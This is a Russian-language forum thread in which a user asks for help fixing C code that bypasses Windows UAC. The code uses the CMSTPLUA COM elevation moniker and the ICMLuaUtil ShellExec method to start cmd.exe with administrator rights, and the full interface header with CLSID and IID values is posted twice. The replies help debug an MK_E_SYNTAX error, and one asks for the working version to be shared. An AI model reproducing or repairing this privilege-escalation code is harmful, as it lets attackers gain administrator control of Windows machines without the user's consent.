Проблема UAC bypass

O

ostanovka777

Доброго времени суток.
Есть код который пропускает UAC, в другом проекте все замечательно работает.
В моем падает с ошибкой.

Ниже код функции:
C:
VOID check()
{
    HRESULT          r = E_FAIL;
    BOOL             bCond = FALSE;
    IID              xIID_ICMLuaUtil;
    CLSID            xCLSID_ICMLuaUtil;
    ICMLuaUtil       *CMLuaUtil = NULL;
    BIND_OPTS3       bop;
    WCHAR            szElevationMoniker[MAX_PATH];

    do {

        if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
            break;
        }
        if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
            break;
        }

        RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));

        strcpy_w(szElevationMoniker, L"Elevation:Administrator!new:");
        strcat_w(szElevationMoniker, T_CLSID_CMSTPLUA);

        RtlSecureZeroMemory(&bop, sizeof(bop));
        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;

        r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIID_ICMLuaUtil, &CMLuaUtil);
        if (r == MK_E_SYNTAX) {
            printf("MK_E_SYNTAX\n");
        }
        if (r != S_OK) {
            printf("wft");
            break;
        }

        r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, L"C:\\windows\\system32\\cmd.exe", NULL, NULL, SEE_MASK_DEFAULT, SW_SHOW);

    } while (bCond);

    if (CMLuaUtil != NULL) {
        CMLuaUtil->lpVtbl->Release(CMLuaUtil);
    }

}

Выходит из цикла, так как r == MK_E_SYNTAX, после выполнения CoGetObject.
Бьюсь вторые сутки не могу понять из-за чего.
В исходном варианте все работает без проблем и при смене аргументов.
Если нужно будет приложу header файл.
Заранее спасибо.
 
  • Нравится
Реакции: id2746

id2746

Green Team
12.11.2016
436
644
BIT
24
я надеюсь рабочая версия будет опубликована тут ?)
 
P

PenGenKiddy

bCond вы когда нибудь изменяете или он всегда должен быть False по вашему? (ПС при False, do..while не отработает 2 раз)
[doublepost=1504387754,1504387540][/doublepost]И приложить Header не забудьте, ибо нету UUID Com интерфейсов даже
 
O

ostanovka777

bCond и не должен изменяться, просто очистится при закрытии приложения.
Прикладываю header
C:
#pragma once
#include <Windows.h>
#include <stdio.h>

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {

    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in ICMLuaUtil * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ICMLuaUtil * This);

    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method1)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method2)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method3)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method4)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method5)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method6)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *ShellExec)(
        __RPC__in ICMLuaUtil * This,
        _In_     LPCTSTR lpFile,
        _In_opt_ LPCTSTR lpParameters,
        _In_opt_ LPCTSTR lpDirectory,
        _In_     ULONG fMask,
        _In_     ULONG nShow
        );

    HRESULT(STDMETHODCALLTYPE *Method8)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method9)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method10)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method11)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method12)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method13)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method14)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method15)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method16)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method17)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method18)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method19)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method20)(
        __RPC__in ICMLuaUtil * This);

    END_INTERFACE

} *PICMLuaUtilVtbl;

interface ICMLuaUtil
{
    CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};

//
//COM objects elevation.
//
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"



VOID check();
wchar_t strcpy_w(wchar_t *dest, const wchar_t *src);
wchar_t strcat_w(wchar_t *dest, const wchar_t *src);
 
P

PenGenKiddy

bCond и не должен изменяться, просто очистится при закрытии приложения.
Прикладываю header
C:
#pragma once
#include <Windows.h>
#include <stdio.h>

typedef interface ICMLuaUtil ICMLuaUtil;

typedef struct ICMLuaUtilVtbl {

    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in ICMLuaUtil * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

    ULONG(STDMETHODCALLTYPE *AddRef)(
        __RPC__in ICMLuaUtil * This);

    ULONG(STDMETHODCALLTYPE *Release)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method1)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method2)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method3)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method4)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method5)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method6)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *ShellExec)(
        __RPC__in ICMLuaUtil * This,
        _In_     LPCTSTR lpFile,
        _In_opt_ LPCTSTR lpParameters,
        _In_opt_ LPCTSTR lpDirectory,
        _In_     ULONG fMask,
        _In_     ULONG nShow
        );

    HRESULT(STDMETHODCALLTYPE *Method8)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method9)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method10)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method11)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method12)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method13)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method14)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method15)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method16)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method17)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method18)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method19)(
        __RPC__in ICMLuaUtil * This);

    HRESULT(STDMETHODCALLTYPE *Method20)(
        __RPC__in ICMLuaUtil * This);

    END_INTERFACE

} *PICMLuaUtilVtbl;

interface ICMLuaUtil
{
    CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};

//
//COM objects elevation.
//
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"



VOID check();
wchar_t strcpy_w(wchar_t *dest, const wchar_t *src);
wchar_t strcat_w(wchar_t *dest, const wchar_t *src);
А что у вас лежит в bop?
 
O

ostanovka777

Что лежит в ответе/памяти?
C:
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
происходит заполнение нулями структуры

CoGetObject возвращает MK_E_SYNTAX
что указывает, если верить msdn (Параметр pszName не является правильно сформированным отображаемым именем.)
[doublepost=1504436236,1504390761][/doublepost]
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!